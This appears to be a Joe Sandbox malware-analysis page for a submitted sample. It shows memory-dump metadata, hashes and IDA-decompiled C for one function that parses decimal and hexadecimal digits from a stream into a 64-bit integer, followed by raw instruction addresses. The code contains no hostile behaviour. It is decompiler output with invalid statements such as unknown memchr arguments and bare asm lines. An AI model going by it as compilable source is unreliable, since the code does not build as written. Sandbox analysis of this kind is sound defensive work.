0x013f6c60
0x013f6c63
0x013f6c68
0x013f6c6e
0x013f6c7a
0x013f6c7d
0x013f6c80
0x013f6c83
0x013f6c86
0x00000000
0x00000000
0x00000000
0x013f6c86
0x013f6b9f
0x013f6b9f
0x013f6ba5
0x013f6bb2
0x013f6bb2
0x00000000

APIs

strlen.MSVCRT ref: 013F6C63

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: c801151d7dbc5ffef0b0145e47662f155a9f679153161b93adda5453c8f92210
Instruction ID: 2f1ef51140d4c391e9da68857415855c123b359a9042ee04882ef55eb6c7a828
Opcode Fuzzy Hash: c801151d7dbc5ffef0b0145e47662f155a9f679153161b93adda5453c8f92210
Instruction Fuzzy Hash: 5A724A75E042588FCB15CFA8C0849ADBBF2BF49314F18865DE965AB3A2D731AC45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0140EDD0 Relevance: 1.9, APIs: 1, Instructions: 678
COMMONCrypto

Download Yara Rule

C-Code - Quality: 43%

			E0140EDD0(void* __ecx, void* __edx, void* __eflags, signed int _a4, signed int _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int* _a28) {
				void* _v16;
				char _v32;
				char _v33;
				signed int _v48;
				signed int _v49;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v65;
				signed int _v66;
				signed int _v67;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				char _v128;
				signed int _t330;
				signed int _t336;
				signed int _t339;
				signed int _t346;
				signed int* _t349;
				signed int* _t358;
				signed int _t359;
				signed int _t364;
				signed int _t365;
				signed int _t366;
				signed int _t369;
				signed int _t373;
				signed int _t374;
				signed int _t376;
				signed char* _t377;
				signed int _t379;
				signed int _t382;
				signed int _t387;
				void* _t389;
				signed int _t395;
				signed int _t397;
				signed int _t398;
				signed int _t400;
				signed char* _t401;
				signed int _t404;
				signed int _t410;
				signed int _t411;
				signed int _t412;
				signed int _t415;
				signed int _t416;
				signed char _t418;
				signed int _t419;
				signed int _t422;
				signed char _t423;
				void* _t426;
				signed char* _t429;
				signed int _t431;
				signed int _t435;
				signed int _t437;
				signed int _t438;
				intOrPtr _t439;
				signed int _t440;
				char* _t441;
				signed int _t442;
				intOrPtr _t443;
				signed int _t445;
				signed int _t446;
				signed int _t451;
				intOrPtr* _t452;
				signed int _t453;
				char _t460;
				signed int _t463;
				void* _t464;
				void* _t465;
				signed int _t467;
				signed int _t468;
				signed int _t472;
				intOrPtr* _t475;
				signed int _t476;
				signed int _t485;
				signed int _t486;
				signed int _t487;
				intOrPtr* _t489;
				signed int _t493;
				void* _t498;
				signed int _t503;
				signed int _t504;
				intOrPtr _t505;
				signed int _t508;
				intOrPtr _t510;
				signed int _t514;
				signed int _t515;
				signed int _t518;
				signed char _t520;
				signed int _t521;
				signed int _t523;
				signed int _t525;
				signed int _t526;
				intOrPtr* _t530;
				signed int _t531;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				signed int* _t538;
				signed int _t539;
				signed int _t540;
				signed int _t541;
				void* _t542;
				void* _t543;

				_t498 = __edx;
				_t439 = _a20;
				_v48 = E013EBDD0(_t439 + 0x6c, __eflags);
				_t534 =  *(_t439 + 0xc) & 0x0000004a;
				if(_t534 == 0x40) {
					_v60 = 8;
					goto L3;
				} else {
					if(_t534 == 8) {
						_t523 =  &_a12;
						_v124 = _t523;
						_t438 = E013EE470(_t329,  &_a4, _t498);
						_v64 = _t438;
						_t543 = _t542 - 4;
						__eflags = _t438;
						if(_t438 != 0) {
							_v67 = 0;
							_t440 = 0;
							_v56 = 0;
							_v49 = 0;
							goto L98;
						} else {
							_v60 = 0x10;
							goto L4;
						}
						goto L52;
					} else {
						_v60 = 0xa;
						L3:
						_t523 =  &_a12;
						_v124 = _t523;
						_t330 = E013EE470(_t329,  &_a4, _t498);
						_v64 = _t330;
						_t543 = _t542 - 4;
						if(_t330 != 0) {
							_v67 = 0;
							_t440 = 0;
							_v56 = 0;
							_v49 = 0;
							goto L29;
						} else {
							L4:
							_t411 = E013EE520( &_a4);
							_t485 = _v48;
							_t440 = _t411;
							_t12 =  &_v67;
							 *_t12 =  *((intOrPtr*)(_t485 + 0x4a)) == _t411;
							if( *_t12 == 0 ||  *((intOrPtr*)(_t485 + 0x4b)) == _t411) {
								_t486 = _v48;
								_t514 =  *(_t486 + 0x10) & 0x000000ff;
								if(_t514 == 0 ||  *((intOrPtr*)(_t486 + 0x25)) != _t411) {
									_t487 = _v48;
									if( *((intOrPtr*)(_t487 + 0x24)) == _t411) {
										goto L11;
									} else {
										E01456F10(_a4);
										_a8 = 0xffffffff;
										_v124 = _t523;
										_t435 = E013EE470( &_a4,  &_a4, _t514);
										_v64 = _t435;
										_t543 = _t543 - 4;
										if(_t435 != 0) {
											_v56 = 0;
											_v49 = 0;
											goto L27;
										} else {
											_t437 = E013EE520( &_a4);
											_t487 = _v48;
											_t440 = _t437;
											_t514 =  *(_t487 + 0x10) & 0x000000ff;
											goto L11;
										}
									}
								} else {
									goto L11;
								}
							} else {
								_v67 = 0;
								_t514 =  *(_t485 + 0x10) & 0x000000ff;
								L11:
								_v56 = 0;
								_v49 = 0;
								_v64 = _t534;
								_t541 = _v60;
								while(_t514 == 0 ||  *((intOrPtr*)(_v48 + 0x25)) != _t440) {
									_t412 = _v48;
									if( *((intOrPtr*)(_t412 + 0x24)) == _t440) {
										break;
									} else {
										if( *((intOrPtr*)(_t412 + 0x4e)) == _t440) {
											__eflags = _t541 - 0xa;
											_t515 = _t514 & 0xffffff00 | _t541 == 0x0000000a;
											_t415 = _v49 & 0x000000ff ^ 0x00000001 | _t515;
											__eflags = _t415;
											if(_t415 == 0) {
												goto L17;
											} else {
												_t541 - 8 = _v64;
												_t493 = _t487 & 0xffffff00 | _t541 == 0x00000008 | _t515 & 0xffffff00 | _v64 == 0x00000000;
												__eflags = _t493;
												_v49 = _t493;
												if(_t493 == 0) {
													_v56 = _v56 + 1;
													_v49 = _t415;
													goto L21;
												} else {
													_t530 = _a4;
													_v56 = 0;
													_t541 = 8;
													_t419 =  *(_t530 + 8);
													_t518 =  *(_t530 + 0xc);
													__eflags = _t419 - _t518;
													if(_t419 < _t518) {
														goto L22;
													} else {
														goto L61;
													}
												}
											}
											goto L52;
										} else {
											if(_v49 == 0) {
												break;
											} else {
												L17:
												_t416 = _v48;
												if( *((intOrPtr*)(_t416 + 0x4c)) == _t440 ||  *((intOrPtr*)(_t416 + 0x4d)) == _t440) {
													_t418 = _t416 & 0xffffff00 | _t541 == 0x00000010 | _v64 & 0xffffff00 | _v64 == 0x00000000;
													if(_t418 == 0) {
														_v60 = _t541;
														_v64 = _t418;
														_v49 = 1;
														goto L29;
													} else {
														_v56 = 0;
														_t541 = 0x10;
														_v49 = 0;
														L21:
														_t530 = _a4;
														_t419 =  *(_t530 + 8);
														_t518 =  *(_t530 + 0xc);
														if(_t419 >= _t518) {
															L61:
															 *((intOrPtr*)( *_t530 + 0x28))();
															_t422 =  *(_t530 + 8);
															_t518 =  *(_t530 + 0xc);
															_a8 = 0xffffffff;
															__eflags = _t422 - _t518;
															if(_t422 < _t518) {
																goto L23;
															} else {
																goto L63;
															}
															goto L52;
														} else {
															L22:
															_t422 = _t419 + 1;
															_a8 = 0xffffffff;
															 *(_t530 + 8) = _t422;
															if(_t422 >= _t518) {
																L63:
																_t422 =  *((intOrPtr*)( *_t530 + 0x24))();
																__eflags = _t422 - 0xffffffff;
																if(_t422 != 0xffffffff) {
																	goto L23;
																} else {
																	_a4 = 0;
																	_t531 = 1;
																	goto L24;
																}
																L52:
																_t443 =  *0x14a31d0; // 0x2
																_t537 = _a4;
																if(_t443 != 0) {
																	asm("lock xadd [ecx-0x4], eax");
																	__eflags = 0xffffffff;
																	if(0xffffffff > 0) {
																		goto L54;
																	} else {
																		goto L127;
																	}
																} else {
																	_t130 =  *((intOrPtr*)(_t460 - 4)) - 1; // -1
																	 *((intOrPtr*)(_t460 - 4)) = _t130;
																	if( *((intOrPtr*)(_t460 - 4)) <= 0) {
																		L127:
																		__eflags = _t460 - 0xc;
																		_v124 =  &_v33;
																		E01438FD0( &_v33, _t460 - 0xc);
																		return _t537;
																	} else {
																		L54:
																		return _t537;
																	}
																}
																L158:
															} else {
																L23:
																_t531 = 0;
															}
														}
														L24:
														_t489 = _a12;
														_t423 = _t422 & 0xffffff00 | _a16 == 0xffffffff;
														_t520 = (_t518 & 0xffffff00 | _t489 != 0x00000000) & _t423;
														if(_t520 != 0) {
															__eflags =  *((intOrPtr*)(_t489 + 8)) -  *((intOrPtr*)(_t489 + 0xc));
															if( *((intOrPtr*)(_t489 + 8)) >=  *((intOrPtr*)(_t489 + 0xc))) {
																_v60 = _t520;
																_t426 =  *((intOrPtr*)( *_t489 + 0x24))();
																_t521 = _v60 & 0x000000ff;
																__eflags = _t426 - 0xffffffff;
																if(_t426 != 0xffffffff) {
																	goto L86;
																} else {
																	_a12 = 0;
																	_t423 = _t521;
																	goto L25;
																}
															} else {
																L86:
																_t423 = 0;
																goto L25;
															}
															goto L158;
														}
														L25:
														if(_t531 != _t423) {
															_t487 = _a4;
															__eflags = _t487;
															if(_t487 == 0) {
																L92:
																_t440 = 0xffffffff;
															} else {
																_t429 =  *(_t487 + 8);
																__eflags = _t429 -  *((intOrPtr*)(_t487 + 0xc));
																if(_t429 >=  *((intOrPtr*)(_t487 + 0xc))) {
																	_t431 =  *((intOrPtr*)( *_t487 + 0x24))();
																	_t440 = _t431;
																	__eflags = _t431 - 0xffffffff;
																	if(_t431 == 0xffffffff) {
																		_a4 = 0;
																		goto L92;
																	}
																} else {
																	_t440 =  *_t429 & 0x000000ff;
																}
															}
															__eflags = _v49;
															if(_v49 == 0) {
																break;
															} else {
																_t514 =  *(_v48 + 0x10) & 0x000000ff;
																continue;
															}
															goto L52;
														} else {
															_v60 = _t541;
															_v64 = 1;
															goto L27;
														}
													}
												} else {
													_v60 = _t541;
													_v64 = 0;
													_v49 = 1;
													L27:
													if(_v60 == 0x10) {
														L98:
														_v96 = 0x16;
														_t535 = 0x10;
														_v60 = 0x16;
													} else {
														L29:
														_t535 = _v60;
														_v96 = _t535;
													}
												}
											}
										}
									}
									goto L30;
								}
								_v60 = _t541;
								__eflags = _v60 - 0x10;
								_v64 = 0;
								if(_v60 != 0x10) {
									goto L29;
								} else {
									goto L98;
								}
								goto L52;
							}
						}
					}
				}
				L30:
				_v32 = E01438880(0, 0,  &_v33);
				if( *(_v48 + 0x10) != 0) {
					_v124 = 0x20;
					E0143A8F0( &_v32);
					_t543 = _t543 - 4;
				}
				_v76 = _t535;
				_t336 = (_v67 & 0x000000ff) + 0xffffffff;
				asm("adc edx, 0x7fffffff");
				_t525 = _t535 >> 0x1f;
				_v92 = _t336;
				_v88 = 0;
				_v72 = _t525;
				_v116 = _t535;
				 *(_t543 + 0xc) = _t525;
				_v124 = _t336;
				_v120 = 0;
				_v80 = E013D61A0();
				_v84 = 0;
				_t339 =  *(_v48 + 0x64) & 0x000000ff;
				_v66 = _t339;
				if(_t339 != 0) {
					__eflags = _v64;
					if(_v64 != 0) {
						_v65 = 0;
						_t536 = 0;
						_t526 = 0;
						_v64 = 0;
						_v66 = _v64 & 0x000000ff;
						goto L46;
					} else {
						_v65 = 0;
						_t536 = 0;
						_t526 = 0;
						_t364 = _v48 + 0x4e;
						__eflags = _t364;
						_v100 = _t364;
						while(1) {
							_t504 = _v48;
							_t365 =  *(_t504 + 0x10) & 0x000000ff;
							__eflags = _t365;
							if(_t365 == 0) {
								goto L107;
							}
							__eflags =  *((intOrPtr*)(_t504 + 0x25)) - _t440;
							if( *((intOrPtr*)(_t504 + 0x25)) == _t440) {
								_t508 = _v56;
								__eflags = _t508;
								if(_t508 == 0) {
									_v66 = 0;
									_v64 = _t365;
									goto L46;
								} else {
									_v124 = _t508;
									E0143ACB0( &_v32);
									_v56 = 0;
									_t543 = _t543 - 4;
									L111:
									_t446 = _a4;
									_t373 =  *(_t446 + 8);
									_t505 =  *((intOrPtr*)(_t446 + 0xc));
									__eflags = _t373 - _t505;
									if(_t373 >= _t505) {
										L121:
										 *((intOrPtr*)( *_t446 + 0x28))();
										_t374 =  *(_t446 + 8);
										_t505 =  *((intOrPtr*)(_t446 + 0xc));
										_a8 = 0xffffffff;
									} else {
										L112:
										_t374 = _t373 + 1;
										__eflags = _t374;
										_a8 = 0xffffffff;
										 *(_t446 + 8) = _t374;
									}
									L113:
									_v60 = 0;
									__eflags = _t374 - _t505;
									if(_t374 >= _t505) {
										_t374 =  *((intOrPtr*)( *_t446 + 0x24))();
										__eflags = _t374 - 0xffffffff;
										if(_t374 == 0xffffffff) {
											_a4 = 0;
										}
										__eflags = _t374 - 0xffffffff;
										_v60 = _t374 == 0xffffffff;
									}
									_t467 = _a12;
									__eflags = _a16 - 0xffffffff;
									_t376 = _t374 & 0xffffff00 | _a16 == 0xffffffff;
									__eflags = _t467;
									if(_t467 != 0) {
										__eflags = _t376;
										if(_t376 != 0) {
											_t376 = 0;
											__eflags =  *((intOrPtr*)(_t467 + 8)) -  *((intOrPtr*)(_t467 + 0xc));
											if( *((intOrPtr*)(_t467 + 8)) >=  *((intOrPtr*)(_t467 + 0xc))) {
												_t382 =  *((intOrPtr*)( *_t467 + 0x24))();
												__eflags = _t382 - 0xffffffff;
												_t282 = _t382 == 0xffffffff;
												__eflags = _t282;
												_t376 = _t382 & 0xffffff00 | _t282;
												if(_t282 == 0) {
													_a12 = 0;
												}
											}
										}
									}
									__eflags = _t376 - _v60;
									if(_t376 == _v60) {
										goto L46;
									} else {
										_t468 = _a4;
										__eflags = _t468;
										if(_t468 == 0) {
											_t440 = 0xffffffff;
										} else {
											_t377 =  *(_t468 + 8);
											__eflags = _t377 -  *((intOrPtr*)(_t468 + 0xc));
											if(_t377 >=  *((intOrPtr*)(_t468 + 0xc))) {
												_t379 =  *((intOrPtr*)( *_t468 + 0x24))();
												_t440 = _t379;
												__eflags = _t379 - 0xffffffff;
												if(_t379 == 0xffffffff) {
													_a4 = 0;
												}
											} else {
												_t440 =  *_t377 & 0x000000ff;
											}
										}
										continue;
									}
								}
							} else {
								goto L107;
							}
							goto L158;
							L107:
							_t366 = _v48;
							__eflags =  *((intOrPtr*)(_t366 + 0x24)) - _t440;
							if( *((intOrPtr*)(_t366 + 0x24)) == _t440) {
								goto L75;
							} else {
								_v120 = _t440;
								_v116 = _v96;
								_t445 = _v100;
								_v124 = _t445;
								_t369 = memchr(??, ??, ??);
								_t463 = _t369;
								__eflags = _t369;
								if(_t369 == 0) {
									goto L75;
								} else {
									_t464 = _t463 - _t445;
									_t229 = _t464 - 6; // -6
									__eflags = _t464 - 0xf;
									_t465 =  >  ? _t229 : _t464;
									__eflags = _v80 - _t536;
									asm("sbb eax, edi");
									if(_v80 < _t536) {
										_t446 = _a4;
										_v65 = _v66 & 0x000000ff;
										_t505 =  *((intOrPtr*)(_t446 + 0xc));
										_t373 =  *(_t446 + 8);
										__eflags = _t373 - _t505;
										if(_t373 < _t505) {
											goto L112;
										} else {
											goto L121;
										}
									} else {
										_t387 = _t536;
										_t539 = _t387 * _v76;
										_t389 = _t465;
										_t526 = (_t387 * _v76 >> 0x20) + _v72 * _t536 + _v76 * _t526;
										asm("cdq");
										_t472 = _v92 - _t389;
										asm("sbb ebx, edx");
										__eflags = _t472 - _t539;
										asm("sbb ebx, edi");
										_v65 = _v65 | _t472 & 0xffffff00 | _t472 - _t539 > 0x00000000;
										_t536 = _t539 + _t389;
										asm("adc edi, edx");
										_t246 =  &_v56;
										 *_t246 = _v56 + 1;
										__eflags =  *_t246;
										goto L111;
									}
									goto L113;
								}
							}
							goto L158;
						}
					}
					goto L158;
				} else {
					_v65 = 0;
					if(_v64 != 0) {
						_t536 = 0;
						_v64 = 0;
						_t526 = 0;
						_v66 = _v64 & 0x000000ff;
						goto L46;
					} else {
						_t536 = 0;
						_t526 = 0;
						_v96 = (_v60 & 0x000000ff) + 0x30;
						while(1) {
							_t395 = _t440;
							if(_v60 > 0xa) {
								goto L72;
							}
							L35:
							if(_t440 <= 0x2f || _v96 <= _t440) {
								L75:
								_t460 = _v32;
								_v66 = 0;
								__eflags =  *(_t460 - 0xc);
								if( *(_t460 - 0xc) == 0) {
									goto L47;
								} else {
									goto L76;
								}
								goto L158;
							} else {
								L37:
								_t87 = _t395 - 0x30; // -80
								_t451 = _t87;
								L38:
								asm("sbb eax, edi");
								if(_v80 < _t536) {
									_t452 = _a4;
									_v65 = 1;
									_t397 =  *(_t452 + 8);
									_t510 =  *((intOrPtr*)(_t452 + 0xc));
									__eflags = _t397 - _t510;
									if(_t397 < _t510) {
										goto L40;
									} else {
										goto L71;
									}
									goto L52;
								} else {
									_t526 = _t451 >> 0x1f;
									_t540 = _t451;
									_t410 = _t536 * _v76;
									asm("sbb ebx, edi");
									asm("sbb ebx, edx");
									_t452 = _a4;
									_v65 = _v65 | _v92 - _t540 & 0xffffff00 | _v92 - _t540 - _t410 > 0x00000000;
									_t536 = _t540 + _t410;
									asm("adc edi, edx");
									_t397 =  *(_t452 + 8);
									_t510 =  *((intOrPtr*)(_t452 + 0xc));
									_v56 = _v56 + 1;
									if(_t397 >= _t510) {
										L71:
										 *((intOrPtr*)( *_t452 + 0x28))();
										_t398 =  *(_t452 + 8);
										_t510 =  *((intOrPtr*)(_t452 + 0xc));
										_a8 = 0xffffffff;
									} else {
										L40:
										_t398 = _t397 + 1;
										_a8 = 0xffffffff;
										 *(_t452 + 8) = _t398;
									}
								}
								_v66 = 0;
								if(_t398 >= _t510) {
									_t398 =  *((intOrPtr*)( *_t452 + 0x24))();
									__eflags = _t398 - 0xffffffff;
									if(_t398 == 0xffffffff) {
										_a4 = 0;
									}
									__eflags = _t398 - 0xffffffff;
									_v66 = _t398 == 0xffffffff;
								}
								_t475 = _a12;
								_t400 = _t398 & 0xffffff00 | _a16 == 0xffffffff;
								if(_t475 != 0 && _t400 != 0) {
									_t400 = 0;
									__eflags =  *((intOrPtr*)(_t475 + 8)) -  *((intOrPtr*)(_t475 + 0xc));
									if( *((intOrPtr*)(_t475 + 8)) >=  *((intOrPtr*)(_t475 + 0xc))) {
										_t404 =  *((intOrPtr*)( *_t475 + 0x24))();
										__eflags = _t404 - 0xffffffff;
										_t207 = _t404 == 0xffffffff;
										__eflags = _t207;
										_t400 = _t404 & 0xffffff00 | _t207;
										if(_t207 == 0) {
											_a12 = 0;
										}
									}
								}
								if(_t400 != _v66) {
									_t476 = _a4;
									__eflags = _t476;
									if(_t476 == 0) {
										__eflags = _v60 - 0xa;
										if(_v60 <= 0xa) {
											goto L75;
										} else {
											_t395 = 0xffffffff;
											_t453 = 0xffffffff;
											goto L101;
										}
									} else {
										_t401 =  *(_t476 + 8);
										__eflags = _t401 -  *((intOrPtr*)(_t476 + 0xc));
										if(_t401 >=  *((intOrPtr*)(_t476 + 0xc))) {
											_t395 =  *((intOrPtr*)( *_t476 + 0x24))();
											_t440 = _t395;
											__eflags = _t395 - 0xffffffff;
											if(_t395 != 0xffffffff) {
												continue;
											} else {
												__eflags = _v60 - 0xa;
												_a4 = 0;
												if(_v60 <= 0xa) {
													goto L75;
												} else {
													_t453 = 0xffffffff;
													L73:
													_t171 = _t453 - 0x61; // -97
													__eflags = _t171 - 5;
													if(_t171 > 5) {
														L101:
														__eflags = _t453 - 0x41 - 5;
														if(_t453 - 0x41 > 5) {
															goto L75;
														} else {
															_t215 = _t395 - 0x37; // 0xffffffc8
															_t451 = _t215;
															goto L38;
														}
													} else {
														_t172 = _t395 - 0x57; // -119
														_t451 = _t172;
														__eflags = _t395 - 0x56;
														if(_t395 != 0x56) {
															goto L38;
														} else {
															goto L75;
														}
													}
												}
											}
										} else {
											_t440 =  *_t401 & 0x000000ff;
											while(1) {
												_t395 = _t440;
												if(_v60 > 0xa) {
													goto L72;
												}
												goto L35;
											}
										}
									}
									goto L158;
								} else {
									_v66 = 1;
									L46:
									_t460 = _v32;
									if( *(_t460 - 0xc) != 0) {
										L76:
										_t441 =  &_v32;
										_v124 = _v56;
										E0143ACB0(_t441);
										_t543 = _t543 - 4;
										_v120 = _t441;
										_t442 = _v48;
										_v124 =  *(_t442 + 0xc);
										_v128 =  *((intOrPtr*)(_t442 + 8));
										_t346 = E01473080();
										__eflags = _t346;
										if(_t346 == 0) {
											 *_a24 = 4;
										}
										_t460 = _v32;
										__eflags = _v56;
										if(_v56 != 0) {
											goto L80;
										} else {
											__eflags = _v49 - 1;
											if(_v49 == 1) {
												goto L80;
											} else {
												__eflags =  *(_t460 - 0xc);
												if( *(_t460 - 0xc) == 0) {
													goto L49;
												} else {
													goto L80;
												}
											}
										}
										goto L158;
									} else {
										L47:
										if(_v49 == 1 || _v56 != 0) {
											L80:
											__eflags = _v64;
											if(_v64 != 0) {
												goto L49;
											} else {
												__eflags = _v65;
												if(_v65 == 0) {
													__eflags = _v67;
													if(_v67 != 0) {
														_t536 =  ~_t536;
														asm("adc edi, 0x0");
														_t526 =  ~_t526;
													}
													_t358 = _a28;
													 *_t358 = _t536;
													_t358[1] = _t526;
												} else {
													__eflags = _v67;
													_t359 = 0xffffffff;
													_t503 = 0x7fffffff;
													if(_v67 != 0) {
														_t359 = 0;
														__eflags = 0;
														_t503 = 0x80000000;
													}
													_t538 = _a28;
													 *_t538 = _t359;
													_t538[1] = _t503;
													 *_a24 = 4;
												}
												goto L50;
											}
											goto L158;
										} else {
											L49:
											_t349 = _a28;
											 *_t349 = 0;
											_t349[1] = 0;
											 *_a24 = 4;
										}
									}
								}
							}
							goto L50;
							L72:
							_t170 = _t440 - 0x30; // -48
							__eflags = _t170 - 9;
							if(_t170 <= 9) {
								goto L37;
							} else {
								goto L73;
							}
							goto L158;
						}
					}
				}
				L50:
				if(_v66 != 0) {
					 *_a24 =  *_a24 | 0x00000002;
				}
				goto L52;
			}

0x0140edd0
0x0140edd9
0x0140ede7
0x0140edea
0x0140edf0
0x0140f5b0
0x00000000
0x0140edf6
0x0140edf9
0x0140f140
0x0140f146
0x0140f149
0x0140f14e
0x0140f151
0x0140f154
0x0140f156
0x0140f6d3
0x0140f6d7
0x0140f6d9
0x0140f6e0
0x00000000
0x0140f15c
0x0140f15c
0x00000000
0x0140f15c
0x00000000
0x0140edff
0x0140edff
0x0140ee06
0x0140ee06
0x0140ee0c
0x0140ee0f
0x0140ee14
0x0140ee17
0x0140ee1c
0x0140f648
0x0140f64c
0x0140f64e
0x0140f655
0x00000000
0x0140ee22
0x0140ee22
0x0140ee25
0x0140ee2a
0x0140ee2d
0x0140ee32
0x0140ee32
0x0140ee36
0x0140ee41
0x0140ee44
0x0140ee4a
0x0140ee51
0x0140ee57
0x00000000
0x0140ee59
0x0140ee5c
0x0140ee61
0x0140ee6b
0x0140ee70
0x0140ee75
0x0140ee78
0x0140ee7d
0x0140f6c3
0x0140f6ca
0x00000000
0x0140ee83
0x0140ee88
0x0140ee8d
0x0140ee90
0x0140ee92
0x00000000
0x0140ee92
0x0140ee7d
0x00000000
0x00000000
0x00000000
0x0140f6f0
0x0140f6f0
0x0140f6f4
0x0140ee96
0x0140ee96
0x0140ee9d
0x0140eea1
0x0140eea4
0x0140eea7
0x0140eeb7
0x0140eebd
0x00000000
0x0140eec3
0x0140eec6
0x0140f177
0x0140f17a
0x0140f17d
0x0140f17d
0x0140f17f
0x00000000
0x0140f185
0x0140f18e
0x0140f193
0x0140f193
0x0140f195
0x0140f198
0x0140f3a0
0x0140f3a4
0x00000000
0x0140f19e
0x0140f19e
0x0140f1a1
0x0140f1a8
0x0140f1ad
0x0140f1b0
0x0140f1b3
0x0140f1b5
0x00000000
0x00000000
0x00000000
0x00000000
0x0140f1b5
0x0140f198
0x00000000
0x0140eecc
0x0140eed0
0x00000000
0x0140eed6
0x0140eed6
0x0140eed6
0x0140eedc
0x0140eef5
0x0140eef7
0x0140f710
0x0140f713
0x0140f716
0x00000000
0x0140eefd
0x0140eefd
0x0140ef04
0x0140ef09
0x0140ef0d
0x0140ef0d
0x0140ef10
0x0140ef13
0x0140ef18
0x0140f1c0
0x0140f1c4
0x0140f1c7
0x0140f1ca
0x0140f1cd
0x0140f1d4
0x0140f1d6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0140ef1e
0x0140ef1e
0x0140ef1e
0x0140ef21
0x0140ef28
0x0140ef2d
0x0140f1e0
0x0140f1e4
0x0140f1e7
0x0140f1ea
0x00000000
0x0140f1f0
0x0140f1f0
0x0140f1f7
0x00000000
0x0140f1f7
0x0140f106
0x0140f106
0x0140f10c
0x0140f114
0x0140f5e5
0x0140f5ea
0x0140f5ec
0x00000000
0x00000000
0x00000000
0x00000000
0x0140f11a
0x0140f11d
0x0140f120
0x0140f125
0x0140f5f2
0x0140f5f5
0x0140f5f8
0x0140f5fb
0x0140f60e
0x0140f12b
0x0140f12b
0x0140f136
0x0140f136
0x0140f125
0x00000000
0x0140ef33
0x0140ef33
0x0140ef33
0x0140ef33
0x0140ef2d
0x0140ef35
0x0140ef35
0x0140ef3c
0x0140ef44
0x0140ef46
0x0140f343
0x0140f346
0x0140f6a2
0x0140f6a5
0x0140f6a8
0x0140f6ac
0x0140f6af
0x00000000
0x0140f6b5
0x0140f6b5
0x0140f6bc
0x00000000
0x0140f6bc
0x0140f34c
0x0140f34c
0x0140f34c
0x00000000
0x0140f34c
0x00000000
0x0140f346
0x0140ef4c
0x0140ef50
0x0140f208
0x0140f20b
0x0140f20d
0x0140f390
0x0140f390
0x0140f213
0x0140f213
0x0140f216
0x0140f219
0x0140f379
0x0140f37c
0x0140f37e
0x0140f381
0x0140f387
0x00000000
0x0140f387
0x0140f21f
0x0140f21f
0x0140f21f
0x0140f219
0x0140f222
0x0140f226
0x00000000
0x0140f22c
0x0140f22f
0x00000000
0x0140f22f
0x00000000
0x0140ef56
0x0140ef56
0x0140ef59
0x00000000
0x0140ef59
0x0140ef50
0x0140f700
0x0140f700
0x0140f703
0x0140f707
0x0140ef5d
0x0140ef61
0x0140f3f1
0x0140f3f1
0x0140f3f8
0x0140f3fd
0x0140ef70
0x0140ef70
0x0140ef70
0x0140ef73
0x0140ef73
0x0140ef61
0x0140eedc
0x0140eed0
0x0140eec6
0x00000000
0x0140eebd
0x0140f3e0
0x0140f3e3
0x0140f3e7
0x0140f3eb
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0140f3eb
0x0140ee36
0x0140ee1c
0x0140edf9
0x0140ef76
0x0140ef91
0x0140ef9b
0x0140f5c0
0x0140f5ca
0x0140f5cf
0x0140f5cf
0x0140efa9
0x0140efac
0x0140efaf
0x0140efb5
0x0140efb8
0x0140efbb
0x0140efbe
0x0140efc1
0x0140efc5
0x0140efc9
0x0140efcc
0x0140efd5
0x0140efdb
0x0140efde
0x0140efe2
0x0140efe7
0x0140f440
0x0140f444
0x0140f7b0
0x0140f7b4
0x0140f7b6
0x0140f7b8
0x0140f7bc
0x00000000
0x0140f44a
0x0140f44d
0x0140f451
0x0140f453
0x0140f455
0x0140f455
0x0140f458
0x0140f45b
0x0140f45b
0x0140f45e
0x0140f462
0x0140f464
0x00000000
0x00000000
0x0140f466
0x0140f469
0x0140f588
0x0140f58b
0x0140f58d
0x0140f7c4
0x0140f7c8
0x00000000
0x0140f593
0x0140f599
0x0140f59c
0x0140f5a1
0x0140f5a8
0x0140f4ef
0x0140f4ef
0x0140f4f2
0x0140f4f5
0x0140f4f8
0x0140f4fa
0x0140f56c
0x0140f570
0x0140f573
0x0140f576
0x0140f579
0x0140f4fc
0x0140f4fc
0x0140f4fc
0x0140f4fc
0x0140f4ff
0x0140f506
0x0140f506
0x0140f509
0x0140f509
0x0140f50d
0x0140f50f
0x0140f784
0x0140f787
0x0140f78a
0x0140f7dc
0x0140f7dc
0x0140f78c
0x0140f78f
0x0140f78f
0x0140f515
0x0140f518
0x0140f51c
0x0140f51f
0x0140f521
0x0140f523
0x0140f525
0x0140f61b
0x0140f61d
0x0140f620
0x0140f628
0x0140f62b
0x0140f62e
0x0140f62e
0x0140f62e
0x0140f631
0x0140f637
0x0140f637
0x0140f631
0x0140f620
0x0140f525
0x0140f52b
0x0140f52e
0x00000000
0x0140f534
0x0140f534
0x0140f537
0x0140f539
0x0140f660
0x0140f53f
0x0140f53f
0x0140f542
0x0140f545
0x0140f768
0x0140f76b
0x0140f76d
0x0140f770
0x0140f778
0x0140f778
0x0140f54b
0x0140f54b
0x0140f54b
0x0140f545
0x00000000
0x0140f539
0x0140f52e
0x00000000
0x00000000
0x00000000
0x00000000
0x0140f46f
0x0140f46f
0x0140f472
0x0140f475
0x00000000
0x0140f47b
0x0140f481
